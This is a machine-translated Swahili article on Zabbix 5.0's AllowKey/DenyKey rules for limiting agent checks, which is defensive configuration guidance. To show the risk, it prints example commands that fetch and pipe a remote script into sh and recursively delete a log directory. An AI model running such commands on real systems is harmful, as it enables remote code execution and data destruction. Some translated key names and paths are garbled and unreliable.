Usaidizi wa kuorodhesha walioidhinishwa na walioidhinishwa kwa vipimo vya upande wa wakala katika Zabbix 5.0

Usaidizi wa orodha nyeusi na orodha ya walioidhinishwa kwa vipimo vya upande wa wakala

Tikhon Uskov, Mhandisi wa Ushirikiano, Zabbix

Masuala ya usalama wa data

Zabbix 5.0 ina kipengele kipya kinachokuwezesha kuboresha usalama katika mifumo kwa kutumia Zabbix Agent na kuchukua nafasi ya parameta ya zamani. WezeshaRemoteCommands.

Uboreshaji katika usalama wa mifumo inayotegemea wakala unatokana na ukweli kwamba wakala anaweza kufanya idadi kubwa ya vitendo vinavyoweza kuwa hatari.

• Wakala anaweza kukusanya karibu taarifa yoyote, ikijumuisha maelezo ya siri au yanayoweza kuwa hatari, kutoka kwa faili za usanidi, faili za kumbukumbu, faili za nenosiri, au faili zingine zozote.

Kwa mfano, kwa kutumia zabbix_get unaweza kufikia orodha ya watumiaji, saraka zao za nyumbani, faili za nenosiri, nk.

Kufikia data kwa kutumia zabbix_get

NOTE. Data inaweza tu kurejeshwa ikiwa wakala ana ruhusa za kusoma kwenye faili inayolingana. Lakini, kwa mfano, faili /nk/passwd/ inayosomwa na watumiaji wote.

• Wakala pia anaweza kutekeleza amri zinazoweza kuwa hatari. Kwa mfano, ufunguo *system.run[]** hukuruhusu kutekeleza amri zozote za mbali kwenye nodi za mtandao, ikijumuisha kuendesha hati kutoka kwa kiolesura cha wavuti cha Zabbix ambacho pia hutekeleza amri kwenye upande wa wakala.

# zabbix_get -s my.prod.host -k system.run["wget http://malicious_source -O- | sh"]

# zabbix_get -s my.prod.host -k system.run["rm -rf /var/log/applog/"]

• Kwenye Linux, wakala huendesha kwa chaguo-msingi bila upendeleo wa mizizi, wakati kwenye Windows huendesha kama huduma kama Mfumo na ina ufikiaji usio na kikomo kwa mfumo wa faili. Ipasavyo, ikiwa hakuna mabadiliko yoyote yanayofanywa kwa vigezo vya Wakala wa Zabbix baada ya usakinishaji, wakala anaweza kufikia sajili, mfumo wa faili na anaweza kutekeleza maswali ya WMI.

Katika matoleo ya awali parameter WezeshaRemoteCommands=0 inaruhusiwa tu kuzima vipimo kwa ufunguo *system.run[]** na hati zinazoendesha kutoka kwa kiolesura cha wavuti, lakini hapakuwa na njia ya kuzuia ufikiaji wa faili binafsi, kuruhusu au kuzima funguo za kibinafsi ambazo zilisakinishwa na wakala, au kupunguza matumizi ya vigezo vya mtu binafsi.

Kwa kutumia kigezo cha EnableRemoteCommand katika matoleo ya awali ya Zabbix

RuhusuKey/DenyKey

Zabbix 5.0 husaidia kulinda dhidi ya ufikiaji huo ambao haujaidhinishwa kwa kutoa orodha zilizoidhinishwa na orodha zisizoruhusiwa ili kuruhusu na kukataa vipimo kwa upande wa wakala.

Katika Zabbix 5.0 funguo zote, pamoja na *system.run[]** zimewashwa, na chaguo mbili mpya za usanidi wa wakala zimeongezwa:

RuhusuUfunguo= - ukaguzi unaoruhusiwa;

DenyKey= - hundi marufuku;

iko wapi muundo wa jina muhimu na vigezo vinavyotumia metacharacters (*).

Vitufe vya AllowKey na DenyKey hukuruhusu kuruhusu au kukataa vipimo mahususi kulingana na mchoro mahususi. Tofauti na vigezo vingine vya usanidi, idadi ya vigezo vya AllowKey/DenyKey haina kikomo. Hii inakuwezesha kufafanua wazi ni nini hasa wakala anaweza kufanya katika mfumo kwa kuunda mti wa hundi - funguo zinazoweza kutekelezwa, ambapo utaratibu ambao umeandikwa una jukumu muhimu sana.

Mlolongo wa sheria

Sheria zinaangaliwa kwa mpangilio ambao zimeingizwa kwenye faili ya usanidi. Ufunguo unaangaliwa kulingana na sheria kabla ya mechi ya kwanza, na mara tu ufunguo wa kipengele cha data unafanana na muundo, unaruhusiwa au kukataliwa. Baada ya hayo, ukaguzi wa sheria unaacha na funguo zilizobaki hazizingatiwi.

Kwa hivyo, ikiwa kipengele kinalingana na sheria ya kuruhusu na kukataa, matokeo yatategemea sheria ambayo ni ya kwanza katika faili ya usanidi.

Sheria 2 tofauti zilizo na muundo sawa na ufunguo vfs.file.size[/tmp/file]

Agizo la kutumia vitufe vya AllowKey/DenyKey:

1. sheria kamili,
2. kanuni za jumla,
3. kanuni ya kukataza.

Kwa mfano, ikiwa unahitaji upatikanaji wa faili kwenye folda fulani, lazima kwanza uruhusu ufikiaji wao, na kisha ukatae kila kitu kingine ambacho hakiingii ndani ya ruhusa zilizowekwa. Ikiwa sheria ya kukataa inatumiwa kwanza, ufikiaji wa folda utakataliwa.

Mlolongo sahihi

Ikiwa unahitaji kuruhusu huduma 2 kufanya kazi kupitia *system.run[]**, na sheria ya kukataa itabainishwa kwanza, huduma hazitazinduliwa, kwa sababu muundo wa kwanza utafanana na ufunguo wowote kila wakati, na sheria zinazofuata zitapuuzwa.

Mlolongo usio sahihi

Sampuli

Kimsingi sheria

Muundo ni usemi wenye kadi-mwitu. Metacharacter (*) inalingana na nambari yoyote ya herufi zozote katika nafasi mahususi. Metacharacter inaweza kutumika katika jina muhimu na katika vigezo. Kwa mfano, unaweza kufafanua kwa ukali paramu ya kwanza na maandishi, na taja inayofuata kama kadi-mwitu.

Vigezo lazima vijumuishwe katika mabano ya mraba [].

• system.run[* - sio sahihi
• vfs.file*.txt] - sio sahihi
• vfs.file.*[*] - haki

Mifano ya kutumia wildcard.

1. Katika jina muhimu na katika parameter. Katika kesi hii, ufunguo haufanani na ufunguo sawa ambao hauna parameter, kwa kuwa katika muundo tulionyesha kwamba tunataka kupokea mwisho fulani wa jina la ufunguo na seti fulani ya vigezo.
2. Ikiwa mchoro hautumii mabano ya mraba, mchoro huruhusu funguo zote ambazo hazina vigezo na hukataa funguo zote zilizo na kigezo maalum.
3. Ikiwa ufunguo umeandikwa kwa ukamilifu na vigezo vimebainishwa kama kadi-mwitu, italingana na ufunguo wowote sawa na vigezo vyovyote na haitalingana na ufunguo bila mabano ya mraba, yaani, itaruhusiwa au kukataliwa.

Sheria za kujaza vigezo.

• Ikiwa ufunguo ulio na vigezo unakusudiwa kutumiwa, vigezo lazima vielezwe kwenye faili ya usanidi. Vigezo lazima vibainishwe kama metacharacter. Inahitajika kukataa kwa uangalifu ufikiaji wa faili yoyote na kuzingatia ni habari gani metric inaweza kutoa chini ya tahajia tofauti - pamoja na bila vigezo.

Vipengele vya funguo za kuandika na vigezo

• Ikiwa ufunguo umebainishwa na vigezo, lakini vigezo ni vya hiari na vimebainishwa kama metacharacter, ufunguo usio na vigezo utatatuliwa. Kwa mfano, ikiwa ungependa kuzima upokeaji wa taarifa kuhusu mzigo kwenye CPU na ubainishe kwamba ufunguo wa system.cpu.load[*] unapaswa kuzimwa, usisahau kwamba ufunguo bila vigezo utarudisha thamani ya wastani ya mzigo.

Sheria za kujaza vigezo

Vidokezo

marekebisho

• Sheria zingine haziwezi kubadilishwa na mtumiaji, kwa mfano, sheria za ugunduzi au sheria za usajili wa kiotomatiki wa wakala. Sheria za AllowKey/DenyKey haziathiri vigezo vifuatavyo:
  - Kipengee cha Jina la Mpangishi
  - HostMetadataItem
  - HostInterfaceItem

NOTE. Msimamizi akizima ufunguo, anapoulizwa, Zabbix haitoi maelezo kuhusu kwa nini kipimo au ufunguo unaangukia katika kitengo cha '.HAIJAUNGWA'. Taarifa kuhusu marufuku ya kutekeleza amri za mbali pia hazionyeshwi kwenye faili za kumbukumbu za wakala. Hii ni kwa sababu za usalama, lakini inaweza kutatiza utatuzi ikiwa metriki itaanguka katika kitengo kisichotumika kwa sababu fulani..

• Haupaswi kutegemea agizo lolote maalum la kuunganisha faili za usanidi wa nje (kwa mfano, kwa mpangilio wa alfabeti).

Huduma za Line ya Amri

Baada ya kuweka sheria, unahitaji kuhakikisha kuwa kila kitu kimeundwa kwa usahihi.

Unaweza kutumia moja ya chaguzi tatu:

• Ongeza kipimo kwenye Zabbix.
• Mtihani na zabbix_agent. Zabbix wakala na chaguo -chapisha (-p) inaonyesha funguo zote (ambazo zinaruhusiwa kwa chaguo-msingi) isipokuwa zile ambazo haziruhusiwi na usanidi. Na kwa chaguo mtihani (-t) kwa ufunguo uliokatazwa utarudi 'Kitufe cha kipengee kisichotumika'.
• Mtihani na zabbix_pata. Huduma zabbix_pata na chaguo -k itarudi'ZBX_NOTSUPPORTED: Kipimo kisichojulikana'.

Ruhusu au kataa

Unaweza kukataa upatikanaji wa faili na kuthibitisha, kwa mfano, kwa kutumia matumizi zabbix_patakwamba ufikiaji wa faili umekataliwa.

**

NOTE. Nukuu katika kigezo hazizingatiwi.

Katika kesi hii, ufikiaji wa faili kama hiyo unaweza kuruhusiwa kupitia njia tofauti. Kwa mfano, ikiwa ulinganifu unaongoza kwake.

Inashauriwa kuangalia chaguzi mbalimbali za kutumia sheria maalum, na pia kuzingatia uwezekano wa kukwepa marufuku.

Maswali na Majibu

Swali. Kwa nini muundo changamano na lugha yake ulichaguliwa kuelezea sheria, ruhusa na makatazo? Kwa nini haikuwezekana kutumia, kwa mfano, maneno ya kawaida ambayo Zabbix hutumia?

Kujibu. Hili ni suala la utendaji wa regex kwani kawaida huwa na wakala mmoja tu na hukagua idadi kubwa ya vipimo. Regex ni operesheni nzito na hatuwezi kuangalia maelfu ya vipimo kwa njia hii. Wildcards - suluhisho la ulimwengu wote, linalotumiwa sana na rahisi.

Swali. Je, faili za Jumuisha hazijajumuishwa katika mpangilio wa alfabeti?

Kujibu. Nijuavyo, haiwezekani kutabiri mpangilio ambao sheria zitatumika ikiwa utaeneza sheria kwenye faili tofauti. Ninapendekeza kukusanya sheria zote za AllowKey/DenyKey katika faili moja Jumuisha, kwa sababu zinaingiliana, na kujumuisha faili hii..

Swali. Katika Zabbix 5.0 chaguo 'WezeshaRemoteCommands=' haipo kwenye faili ya usanidi, na ni AllowKey/DenyKey pekee zinazopatikana?

Jibu. ndiyo hiyo ni sahihi.

Asante!

Chanzo: mapenzi.com